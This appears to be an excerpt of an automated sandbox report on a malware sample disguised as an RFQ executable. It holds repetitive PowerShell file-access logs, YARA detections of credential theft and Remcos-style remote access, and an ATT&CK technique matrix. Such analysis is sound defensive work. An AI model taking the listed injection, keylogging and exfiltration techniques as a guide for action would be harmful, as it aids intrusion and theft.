              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00405D02 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D02

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5772, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EPE0FDJump to behavior
              Source: Yara matchFile source: 00000007.00000002.3373300576.000000002495F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5772, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              412
              Process Injection
              1
              Masquerading
              11
              Input Capture
              11
              Security Software Discovery
              Remote Services11
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory2
              Process Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules
              Logon Script (Windows)Logon Script (Windows)412
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares1
              Clipboard Data
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Software Packing
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets2
              File and Directory Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials14
              System Information Discovery
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.